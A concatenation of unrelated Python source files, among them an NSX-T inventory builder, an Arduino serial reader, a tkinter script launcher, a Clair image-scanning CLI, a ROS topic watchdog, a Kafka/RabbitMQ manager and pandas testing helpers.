'token': nsxt_mgmt_plane.token,
}
self.iterated_inventory[str(self.iteration)]['nsxt_adapter'] = tree
return tree
def provide_nsxt_mgmt_cluster(self) -> dict:
tree = dict()
for nsxt_entry in self.nsxt_dict:
nsxt_mgmt_plane = self.nsxt_dict[nsxt_entry]
if not nsxt_mgmt_plane:
continue
tree[nsxt_mgmt_plane.target] = dict()
for nsxt_adapter in nsxt_mgmt_plane.adapter:
for mgmt_cluster in nsxt_adapter.management_cluster:
tree[nsxt_mgmt_plane.target][mgmt_cluster.uuid] = {
'uuid': mgmt_cluster.uuid,
'name': mgmt_cluster.name,
'nsxt_adapter_name': nsxt_adapter.name,
'nsxt_adapter_uuid': nsxt_adapter.uuid,
'target': nsxt_mgmt_plane.target,
'token': nsxt_mgmt_plane.token,
}
self.iterated_inventory[str(self.iteration)]['nsxt_mgmt_cluster'] = tree
return tree
def provide_nsxt_mgmt_nodes(self) -> dict:
tree = dict()
for nsxt_entry in self.nsxt_dict:
nsxt_mgmt_plane = self.nsxt_dict[nsxt_entry]
if not nsxt_mgmt_plane:
continue
tree[nsxt_mgmt_plane.target] = dict()
for nsxt_adapter_object in nsxt_mgmt_plane.adapter:
for mgmt_cluster in nsxt_adapter_object.management_cluster:
for mgmt_node in mgmt_cluster.management_nodes:
tree[nsxt_mgmt_plane.target][mgmt_node.uuid] = {
'uuid': mgmt_node.uuid,
'name': mgmt_node.name,
'mgmt_cluster_name': mgmt_cluster.name,
'mgmt_cluster_uuid': mgmt_cluster.uuid,
'nsxt_adapter_name': nsxt_adapter_object.name,
'nsxt_adapter_uuid': nsxt_adapter_object.uuid,
'target': nsxt_mgmt_plane.target,
'token': nsxt_mgmt_plane.token,
}
self.iterated_inventory[str(self.iteration)]['nsxt_mgmt_nodes'] = tree
return tree
def provide_nsxt_mgmt_service(self) -> dict:
tree = dict()
for nsxt_entry in self.nsxt_dict:
nsxt_mgmt_plane = self.nsxt_dict[nsxt_entry]
if not nsxt_mgmt_plane:
continue
tree[nsxt_mgmt_plane.target] = dict()
for nsxt_adapter_object in nsxt_mgmt_plane.adapter:
for mgmt_cluster in nsxt_adapter_object.management_cluster:
for mgmt_node in mgmt_cluster.management_nodes:
for mgmt_service in mgmt_node.management_service:
tree[nsxt_mgmt_plane.target][mgmt_service.uuid] = {
'uuid': mgmt_service.uuid,
'name': mgmt_service.name,
'nsxt_adapter_name': nsxt_adapter_object.name,
'nsxt_adapter_uuid': nsxt_adapter_object.uuid,
'mgmt_cluster_name': mgmt_cluster.name,
'mgmt_cluster_uuid': mgmt_cluster.uuid,
'mgmt_node_name': mgmt_node.name,
'mgmt_node_uuid': mgmt_node.uuid,
'target': nsxt_mgmt_plane.target,
'token': nsxt_mgmt_plane.token,
}
self.iterated_inventory[str(self.iteration)]['nsxt_mgmt_service'] = tree
return tree
|
ArduinoSerial_PyQt_Demo_ThreadMonitorSerial.py
|
# -*- coding: utf-8 -*-
import queue
import threading
import serial
import random
import time
from ArduinoSerial_PyQt_Demo_Global import *
class ThreadArduino:
"""
"""
def __init__(self, port, delay):
self.SERIALPORT = port
self.running = 1
self.msg = ''
self.delay = delay
self.thread1 = threading.Thread(target=self.worker)
self.thread1.start()
def worker(self):
"""
This is where we handle the asynchronous I/O.
Put your stuff here.
"""
# rand = random.Random()
ser = serial.Serial(SERIALPORT, 9600)
while self.running:
time.sleep(self.delay)
# self.msg = str(random.random()) + '\n'
# This is where we poll the Serial port.
self.msg = ser.readline().decode();
if (self.msg):
queue.put(self.msg)
else: pass
if self.running == 0:
ser.close()
|
test20181224.py
|
from runpy import run_path
from tkinter import *
import multiprocessing
import os
# from multiprocessing import Process
def make_app():
app = Tk()
app.geometry('300x300')
Label(app, text='auto run script', font=('Arial', 25, 'bold')).pack()
Listbox(app, name='listb', bg='#f2f2f2').pack(fill=BOTH, expand=True)
Button(text='run', command=run_script).pack()
return app
def ui_make_list():
listb = app.children['listb']
for d in os.listdir():
listb.insert(END, d)
def run_script():
listb = app.children['listb']
s_path = listb.get(ACTIVE)
p = multiprocessing.Process(name='print', target=run_path, args=(s_path,))
p.start()
def stop_script():
for p in multiprocessing.active_children():
if p.name == 'print':
p.terminate()
def watcher():
print(multiprocessing.active_children())
listb = app.children['listb']
s_path = listb.get(ACTIVE)
print(s_path)
app.after(1000, watcher)
if __name__ == '__main__':
app = make_app()
app.after(100, ui_make_list)
app.after(0, watcher)
app.mainloop()
|
cli.py
|
import click
import json
from os import path
import shutil
import socket
from multiprocessing import Process
from . import VERSION
from .clair import check_clair, post_layer, get_report, format_report_text, ClairException
from .util import sha256, wait_net_service, err_and_exit, pretty_json
from .image import check_image, image_to_tgz, http_server, ImageException
@click.command()
@click.option('--clair-uri', default="http://localhost:6060",
help='Base URI for your Clair server')
@click.option('--text-output', is_flag=True, help='Report in Text (Default)')
@click.option('--json-output', is_flag=True, help='Report in JSON')
@click.option('--bind-ip', default="",
help='IP address that the HTTP server providing image to Clair should listen on')
@click.option('--bind-port', default=8088,
help='Port that the HTTP server providing image to Clair should listen on')
@click.option('--verbose', is_flag=True, help='Show progress messages to STDERR')
@click.version_option(version=VERSION)
@click.argument('image', required=True)
def cli(image, clair_uri, text_output, json_output, bind_ip, bind_port, verbose):
# Try to get host IP that will be accessible to clair in docker
if bind_ip == "":
local_ip = socket.gethostbyname(socket.gethostname())
if local_ip == "127.0.0.1":
err_and_exit("Local IP resolved to 127.0.0.1. Please use --bind-ip to specify your true IP address, so that the clair scanner can access the SIF image.", 1)
bind_ip = local_ip
API_URI = clair_uri + '/v1/'
# Check image exists, and export it to a gzipped tar in a temporary directory
try:
check_image(image)
(tar_dir, tar_file) = image_to_tgz(image, verbose)
except ImageException as e:
err_and_exit(e, 1)
# Image name for Clair will be the SHA256 of the .tar.gz
image_name = sha256(tar_file)
if verbose:
click.echo("Image has SHA256: %s" % image_name, err=True)
# Make sure we can talk to Clair OK
try:
check_clair(API_URI, verbose)
except ClairException as e:
err_and_exit(e)
# Start an HTTP server to serve the .tar.gz from our temporary directory
# so that Clair can retrieve it
httpd = Process(target=http_server, args=(tar_dir, bind_ip, bind_port, verbose))
httpd.daemon = True
httpd.start()
# Allow up to 30 seconds for the httpd to start and be answering requests
httpd_ready = wait_net_service(bind_ip, bind_port, 30)
if not httpd_ready:
httpd.terminate()
shutil.rmtree(tar_dir)
err_and_exit("Error: HTTP server did not become ready\n", 1)
image_uri = 'http://%s:%d/%s' % (bind_ip, bind_port, path.basename(tar_file))
# Register the iamge with Clair as a docker layer that has no parent
try:
post_layer(API_URI, image_name, image_uri, verbose)
except ClairException as e:
httpd.terminate()
shutil.rmtree(tar_dir)
err_and_exit(e, 1)
# Done with the .tar.gz so stop serving it and remove the temp dir
httpd.terminate()
shutil.rmtree(tar_dir)
# Retrieve the vulnerability report from Clair
report = get_report(API_URI, image_name)
# Spit out the report on STDOUT
if json_output:
pretty_report = pretty_json(report)
click.echo(pretty_report)
else:
format_report_text(report)
|
topic_observer.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (C) 2020, Raffaello Bonghi <raffaello@rnext.it>
# All rights reserved
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import rospy
import importlib
import rosservice
import genpy
from threading import Thread
class Observer(Thread):
def __init__(self, topic_name, topic_type, timeout, service, request):
super(Observer, self).__init__()
self.timer = None
self.timeout = timeout
self.service = service
self.request = request
# Disable check timeout
self.last_message = -1
# Extract topic class
package, message = topic_type.split('/')
mod = importlib.import_module(package + '.msg')
topic_type = getattr(mod, message)
# Launch Joystick reader
rospy.Subscriber(topic_name, topic_type, self.topic_callback)
# Service classes
self.service_proxy = None
self.service_class = None
# Start Service client
self._thread = Thread(target=self._init_service, args=[])
self._thread.start()
# Start thread
self.start()
def _init_service(self):
try:
rospy.wait_for_service(self.service)
# Extract service class by name
self.service_class = rosservice.get_service_class_by_name(self.service)
self.service_proxy = rospy.ServiceProxy(self.service, self.service_class)
rospy.loginfo("Initialized {service}".format(service=self.service))
except rospy.ServiceException, error:
rospy.logerr("Service call failed: {error}".format(error=error))
except rosservice.ROSServiceException, error:
rospy.logerr("Service call failed: {error}".format(error=error))
except rospy.ROSException, error:
rospy.loginfo("Service error")
def fire_service(self):
# Call service
if self.service_proxy is None and self.service_class is None:
rospy.logerr("Service {service} not initializated".format(service=self.service))
return
# Make service message
service_class = self.service_class._request_class()
try:
genpy.message.fill_message_args(service_class, [self.request])
except genpy.MessageException, error:
rospy.logerr("Message in {service}: {error}".format(service=self.service, error=error))
return
# Run service proxy
try:
res = self.service_proxy(service_class)
rospy.loginfo("Output {service} {res}".format(service=self.service, res=res.return_))
except rospy.ServiceException, error:
rospy.logerr("Service call failed: {error}".format(error=error))
# Restart initialization thread
self._thread.join()
if not self._thread.is_alive():
self._thread = Thread(target=self._init_service, args=[])
self._thread.start()
def run(self):
# Running only with ROS active
while not rospy.is_shutdown():
if self.last_message > 0:
# Timeout in minutes
if rospy.get_time() - self.last_message >= self.timeout * 60:
# Clean message
self.last_message = -1
# Fire service
self.fire_service()
# Close thread
rospy.logdebug("Close!")
def topic_callback(self, data):
# Initialize timer
self.last_message = rospy.get_time()
def topic_observer():
rospy.init_node('topic_observer', anonymous=True)
# Load topic to observer
topic_name = rospy.get_param("~name", "chatter")
topic_type = rospy.get_param("~type", "std_msgs/String")
timeout = rospy.get_param("~timeout", 1)
# Load service and request
service = rospy.get_param("~service", "")
request = rospy.get_param("~request", {})
rospy.loginfo("Timeout={timeout}min Name={name} Type={type}".format(timeout=timeout, name=topic_name, type=topic_type))
# Start observer
Observer(topic_name, topic_type, timeout, service, request)
# Spin message
rospy.spin()
if __name__ == '__main__':
topic_observer()
# EOF
|
manager.py
|
import logging
logger = logging.getLogger(__name__)
logger.debug("Loaded " + __name__)
import os
import sys
import signal
from .kafka_connector import KafkaConnector
from .rabbitMqConnector import RabbitMqConnector
import threading
from .vedaio import VedaSocketIO
class Manager(object):
Type = "Manager"
def __init__(self, **kwargs):
super(Manager, self).__init__()
self.behaviour = kwargs.get('behaviour')
self.connector_type = kwargs.get('connector_type','kafka')
self.kafka_client_type = kwargs.get('kafka_client_type',None)
self.kafka_client_config = kwargs.get('kafka_client_config',None)
self.rabbit_client_config=kwargs.get('rabbit_client_config',None)
self.pid = os.getpid()
self.exit_code = 0
if self.connector_type == 'kafka':
self.connected_behaviour = KafkaConnector(
self.behaviour,
kafka_client_type=self.kafka_client_type,
on_exit=self.stop,
**self.kafka_client_config)
if self.connector_type == 'rabbitMq':
self.rabbit_client_config = kwargs.get('rabbit_client_config')
self.connected_behaviour = RabbitMqConnector(
self.behaviour,
on_exit=self.stop,
**self.rabbit_client_config)
self.signal_map = kwargs.get('signal_map', {})
# Set Kafka Enable/Disable on SIGUSR2 (12)
signal.signal(10, self.receiveSignal)
signal.signal(12, self.receiveSignal)
signal.signal(signal.SIGTERM, self.receiveSignal)
# Socket IO based Live updates
if not self.connected_behaviour.behavior.offlineMode and self.connector_type!='rabbitMq':
self.socketClient=VedaSocketIO(subscriptions=self.subscriptionTopics())
self.registerUpdateHandler()
###### Update Related Functions
def subscriptionTopics(self,subscriptions=[]):
subscriptions = self.connected_behaviour.subscriptionTopics(subscriptions)
logger.info("Manager: Subscription Topics: {}".format(subscriptions))
return subscriptions
# update event callback
def update(self, data):
logger.info("Manager: Update triggered with data:{}".format(data))
UpdateSuccess = self.connected_behaviour.update(data)
logger.info("Manager: Hot update status:{}".format(UpdateSuccess))
# Handle update if not handled already
if not UpdateSuccess:
self.stop(exit_code=100)
# register update event callback
def registerUpdateHandler(self):
@self.socketClient.sio.on("message")
def my_message(data):
self.update(data)
###### Run Method
def run(self):
logger.info("Manager run() called.")
from flask import current_app as app
self.connected_behaviour_thread = threading.Thread(target=self.connected_behaviour.run, args=(app._get_current_object(),))
self.connected_behaviour_thread.start()
def onStart(self):
logger.info("Manager onStart() called.")
def onExit(self):
logger.info("Manager onExit() called.")
# Handling Signals
def receiveSignal(self, signal_number, frame):
print('Received:', signal_number)
if(signal_number in self.signal_map):
f = self.signal_map[signal_number]
f['func'](*f['args'], **f['kwargs'])
# Set Kafka Enable/Disable on SIGUSR2 (12)
if(signal_number == 10):
logger.info("Enaling Kafka")
self.connected_behaviour.enable_kafka()
if(signal_number == 12):
logger.info("Disabling Kafka")
self.connected_behaviour.disable_kafka()
if (signal_number == signal.SIGTERM):
logger.info("Stopping Everything")
self.cleanup()
def onSignal(self):
logger.info("Manager Signal Handler Initialized.")
logger.info('My PID is:{}'.format(str(os.getpid())))
# Register signals
for k,v in self.signal_map.items():
print("Registering Signal = {}".format(k))
signal.signal(k, self.receiveSignal)
def stop(self, exit_code=0):
logger.info("Stopping function triggered with exit_code:{}".format(exit_code))
self.exit_code=exit_code
os.kill(self.pid, signal.SIGTERM)
def cleanup(self):
if not self.connected_behaviour.behavior.offlineMode:
self.socketClient.sio.disconnect()
self.connected_behaviour.stop()
self.connected_behaviour_thread.join(timeout=10)
exit(self.exit_code)
|
__init__.py
|
from __future__ import annotations
import collections
from datetime import datetime
from decimal import Decimal
from functools import wraps
import operator
import os
import re
import string
from typing import (
TYPE_CHECKING,
Callable,
ContextManager,
Counter,
Iterable,
)
import warnings
import numpy as np
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._typing import Dtype
from pandas.core.dtypes.common import (
is_datetime64_dtype,
is_datetime64tz_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
)
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas._testing._io import ( # noqa:F401
close,
network,
round_trip_localpath,
round_trip_pathlib,
round_trip_pickle,
with_connectivity_check,
write_to_compressed,
)
from pandas._testing._random import ( # noqa:F401
randbool,
rands,
rands_array,
randu_array,
)
from pandas._testing._warnings import assert_produces_warning # noqa:F401
from pandas._testing.asserters import ( # noqa:F401
assert_almost_equal,
assert_attr_equal,
assert_categorical_equal,
assert_class_equal,
assert_contains_all,
assert_copy,
assert_datetime_array_equal,
assert_dict_equal,
assert_equal,
assert_extension_array_equal,
assert_frame_equal,
assert_index_equal,
assert_interval_array_equal,
assert_is_sorted,
assert_is_valid_plot_return_object,
assert_numpy_array_equal,
assert_period_array_equal,
assert_series_equal,
assert_sp_array_equal,
assert_timedelta_array_equal,
raise_assert_detail,
)
from pandas._testing.compat import get_dtype # noqa:F401
from pandas._testing.contexts import ( # noqa:F401
RNGContext,
decompress_file,
ensure_clean,
ensure_clean_dir,
ensure_safe_environment_variables,
set_timezone,
use_numexpr,
with_csv_dialect,
)
from pandas.core.arrays import (
DatetimeArray,
PandasArray,
PeriodArray,
TimedeltaArray,
period_array,
)
if TYPE_CHECKING:
from pandas import (
PeriodIndex,
TimedeltaIndex,
)
_N = 30
_K = 4
UNSIGNED_INT_DTYPES: list[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: list[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: list[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: list[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: list[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: list[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: list[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: list[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: list[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: list[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES: list[Dtype] = [bool, "bool"]
BYTES_DTYPES: list[Dtype] = [bytes, "bytes"]
OBJECT_DTYPES: list[Dtype] = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
NULL_OBJECTS = [None, np.nan, pd.NaT, float("nan"), pd.NA, Decimal("NaN")]
EMPTY_STRING_PATTERN = re.compile("^$")
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("always", category)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("ignore", category)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
if isinstance(expected, RangeIndex):
# pd.array would return an IntegerArray
expected = PandasArray(np.asarray(expected._values))
else:
expected = pd.array(expected)
elif box_cls is Index:
expected = Index(expected)
elif box_cls is Series:
expected = Series(expected)
elif box_cls is DataFrame:
expected = Series(expected).to_frame()
if transpose:
# for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length. But convert to two rows to avoid
# single-row special cases in datetime arithmetic
expected = expected.T
expected = pd.concat([expected] * 2, ignore_index=True)
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Others
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k: int = 10, freq="B", name=None, **kwargs) -> DatetimeIndex:
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k: int = 10, freq="D", name=None, **kwargs) -> TimedeltaIndex:
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k: int = 10, name=None, **kwargs) -> PeriodIndex:
dt = datetime(2000, 1, 1)
return pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
* id : int dtype with
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k: int = 10) -> Iterable[Index]:
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs: list[Callable[..., Index]] = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(np.random.randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(np.random.randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(np.random.randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(
np.random.randn(nper), index=makeDateIndex(nper, freq=freq), name=name
)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(np.random.randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame() -> DataFrame:
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func_dict: dict[str, Callable[..., Index]] = {
"i": makeIntIndex,
"f": makeFloatIndex,
"s": makeStringIndex,
"u": makeUnicodeIndex,
"dt": makeDateIndex,
"td": makeTimedeltaIndex,
"p": makePeriodIndex,
}
idx_func = idx_func_dict.get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
list_of_lists = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
# Deprecated since version 3.9: collections.Counter now supports []. See PEP 585
# and Generic Alias Type.
cnt: Counter[str] = collections.Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
list_of_lists.append(result)
tuples = list(zip(*list_of_lists))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
